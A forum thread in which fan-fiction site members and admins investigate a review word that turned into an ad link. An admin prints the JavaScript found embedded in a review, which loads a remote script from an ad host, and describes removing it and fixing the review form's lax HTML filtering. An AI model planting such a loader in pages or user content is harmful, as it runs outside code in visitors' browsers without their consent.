Dokuga Forum
Welcome, Guest
Please Login or Register.    Lost Password?
Link to Beenverified??
(1 viewing) 1 Guest
Go to bottom
TOPIC: Link to Beenverified??
Knight of Disorder
Shrine Girl
graphgraph
User Offline Click here to see the profile of this user
Link to Beenverified?? 11 Years, 4 Months ago Karma: 76
I just wanted to ask... I got a review on Dogs on Monogamy from DQ, and one of the words in her review has turned into a link that takes you to beenverified.com... is it supposed to do that? The word by the way is stalking... does anyone else see it or is it just me. If it's just me then....

"DAMN VIRUS!!!!!!!"

If it's not, then any help would be appreciated.

Logged Logged

My Motto:
Honor mea arma est, timor mea stultitia est.
Respect is my Weapon, Fear is my Folly.

My Belief:
If you can, do. If you can't, try.
  The administrator has disabled public write access.
WiccanMethuselah
Admin
graphgraph
Re:Link to Beenverified?? 11 Years, 4 Months ago Karma: 277
Knight of Disorder wrote:
I just wanted to ask... I got a review on Dogs on Monogamy from DQ, and one of the words in her review has turned into a link that takes you to beenverified.com... is it supposed to do that? The word by the way is stalking... does anyone else see it or is it just me. If it's just me then....

"DAMN VIRUS!!!!!!!"

If it's not, then any help would be appreciated.

I think Mitharus needs to take a look at this... I just attempted to modify this review in the database, and it came up with the linked word again! Sounds like we have a system glitch??

Beenverified is a legitimate site, but I wouldn't click on any links in reviews until we get this figured out!!!
O.o
~~Wiccan~~

Logged Logged

\\\\\\\\\\\\\\\"The foolish and the dead alone never change their opinion.\\\\\\\\\\\\\\\"
- James Russell Lowell 1864

WiccanMethuselah
Admin
graphgraph
AAANNNDDD... posting a test review turns up a linked "stalking" in mine as well. Definitely a job for Mith!!!
:?
~~me~~

Logged Logged

\\\\\\\\\\\\\\\"The foolish and the dead alone never change their opinion.\\\\\\\\\\\\\\\"

Knight of Disorder
Shrine Girl
graphgraph
Re:Link to Beenverified?? 11 Years, 4 Months ago Karma: 76
I just wanted to let someone know. Apparently it's something called Click to Continue > by text-enhance...

Logged Logged

Last Edit: 2012/12/18 14:16 By Knight of Disorder. Reason: Information

My Motto:

My Belief:
WiccanMethuselah
Admin
graphgraph
I just wanted to let someone know. Apparently it's something called Click to Continue > by text-enhance...

I saw that... and left a review on another author's story but it didn't include the hypertext link on that one. You'd think if it was a virus, it'd happen on any review but evidently not.

*sigh*

Logged Logged

Knight of Disorder
Shrine Girl
graphgraph
WiccanMethuselah wrote:

I saw that... and left a review on another author's story but it didn't include the hypertext link on that one. You'd think if it was a virus, it'd happen on any review but evidently not.

*sigh*

My understanding is that text-enhance is an adware plugin. I've deleted my cookies though and even run all three anti-malware programs on my computer so I don't have it. Since it didn't appear on any other stories I don't know either. My thought was that it was dropped onto the server but if other's aren't suffering it as well then... yeah.

Logged Logged

My Motto:

My Belief:
DemonQueen17
Admin
graphgraph
Re:Link to Beenverified?? 11 Years, 4 Months ago Karma: 66
I'm not sure if it's me but that usually happens when the browser is Firefox. But to be on the safe side, do NOT click to continue. You just might end up going to a site full of ads, malware and spyware.

Logged Logged

Everyone has their addictions. Mine are fanfiction, Sesshomaru and KARMA!!!!!!!!!!

Bakusaiga is mine via the Claiming Game thread.
Knight of Disorder
Shrine Girl
graphgraph
I use chrome, well Iron, with Ghostery and Adblock. So I don't even understand why I can see it...

Logged Logged

My Motto:

My Belief:
WiccanMethuselah
Admin
graphgraph
I use Firefox and have never had anything of this sort pop up in reviews. Never left one with a hypertext word, haven't seen many with hypertext either.

I have Norton and run Malwarebytes regularly.

Since all of us can both see it and possibly click on it, I'm thinking that it is a bit more ingrained than your usual adware. Then again, I have no clue how that stuff burrows itself into things, so I'm probably all wet too!

~~me~~

Logged Logged

Knight of Disorder
Shrine Girl
graphgraph
Well for it to be appearing on the site, it would have to be injected into the server. Or if it was only happening on a single page, into the code which generated that page. That's my understanding at least. It's been far to long since I've done anything with computers though. I still remember when Firefox was the height of security because it was so new.

Edit: Apparently a lot of people have problems with it. There are endless sites about how to rid it from your computer.

Logged Logged

Last Edit: 2012/12/18 15:51 By Knight of Disorder.

My Motto:

My Belief:
Mitharus
Admin
graphgraph
Re:Link to Beenverified?? 11 Years, 4 Months ago Karma: 53
Found it...

Mistress of Rave left a review on chapter six which inserted the following into the review:

Code:

<script id="__changoScript" type="text/javascript">// <![CDATA[
var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src = ( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})();
// ]]></script>

That code above is executed ... and well... takes over parts....

I'll need to dig into the site review code and see why exactly it isn't disallowing that when a review is posted.

Edit:
Removed the JavaScript from the review that was left, so when you view the review it doesn't bring up the linking anymore. But currently I haven't had a chance to dig into the review code so it could still pop back up in one way or another.

-J

Logged Logged

Last Edit: 2012/12/20 12:10 By mitharus. Reason: Expand upon previous edit message
Mitharus
Admin
graphgraph
Re:Link to Beenverified?? 11 Years, 3 Months ago Karma: 53
Okay ... I *think* I found where the review code was allowing random HTML in (basically allowing raw data, and doing no checks at all).

I've changed it to allow *basic* HTML ... and using the bold/italics/underline buttons in the review seem to work and it pulls out other stuff [1]...

We'll see if injecting into the uploaded stream will still cause it... but I don't have any programs sitting around to test modifying the review form data when posted, so we'll just have to see what happens from here on out.

-J

[1] - Well, converts it... so anything that would be processed as an HTML tag is encoded.

Logged Logged
LibraCourt
Pup
graphgraph
Re:Link to Beenverified?? 10 Years, 11 Months ago Karma: 2
I know I've been seeing it and not just on this site. It's been happening on a few other sites as well. Tried doing a clean of my system, but I'm still seeing it. I really have no clue how to get rid of it cause I find it so annoying!

Logged Logged
Go to top

INUYASHA © Rumiko Takahashi/Shogakukan • Yomiuri TV • Sunrise 2000
No money is being made from the creation or viewing of content on this site, which is strictly for personal, non-commercial use, in accordance with the copyright.